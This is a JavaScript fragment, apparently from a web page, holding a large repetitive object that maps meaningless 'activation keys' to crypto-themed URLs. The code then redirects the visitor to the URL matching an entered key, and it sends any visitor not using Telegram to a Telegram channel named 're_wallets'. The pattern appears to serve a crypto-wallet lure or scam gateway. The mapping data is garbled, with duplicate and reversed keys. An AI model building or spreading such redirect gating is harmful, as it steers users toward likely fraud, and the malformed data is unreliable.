 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
  "ZXS4CD5FVU6BG": "https://oracrypto.github.io/4b/",    "ZXS4CD5FVU6BG": "TBYUNMILCVGBHJN",  "AXSERBGYU9GNH": "https://www.bitcoinzn.com",
"AXSERBGYU9GNH": "XECRTVBYUNIM",   "AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVU6BG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "AXSERBGYU9GNH": "XECRTVBYUNIM",    "AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVU6BG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",    "ZXS4CD5FVU6BG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",   "ZXS4CD5FVU6BG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
  "B76GGEURG95FE": "https://oracrypto.github.io/6b/", "A4SE5DRTYUVYBIUNLK": "TBYUNMILCVGBHJN", "AXSERBGYU9GNH": "XECRTVBYUNIM",   "AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVU6BG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",     "ZXS4CD5FVU6BG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
"AXSERBGYU9GNH": "XECRTVBYUNIM",     "AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVU6BG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",   "ZXS4CD5FVU6BG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
"AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVU6BG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
"AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVU6BG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
"AXSERBGYU9GNH": "XECRTVBYUNIM",   "AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVU6BG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",     "ZXS4CD5FVU6BG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com",








  
            "AXSERBGYU9GNH": "www.esdrtfgyuhj.site"











              
               
            };

            
            if (keyMappings[key]) {
                window.location.href = keyMappings[key]; 
            } else {
                errorMessage.textContent = "Invalid activation key";
                errorMessage.style.display = "block";
            }
        }

window.onload = function() {
      const userAgent = navigator.userAgent || navigator.vendor || window.opera;

        const isTelegram = userAgent.toLowerCase().includes("telegram");

      if (!isTelegram) {
          window.location.href = "https://t.me/re_wallets";
      }
      }


document.addEventListener('click', function(event) {
   
    if (document.activeElement && (document.activeElement.tagName === "INPUT" || document.activeElement.tagName === "TEXTAREA")) {
       
    }
    window.onload = function() {
      const userAgent = navigator.userAgent || navigator.vendor || window.opera;

        const isTelegram = userAgent.toLowerCase().includes("telegram");

      if (!isTelegram) {
          window.location.href = "https://t.me/re_wallets";
      }
      };        
});
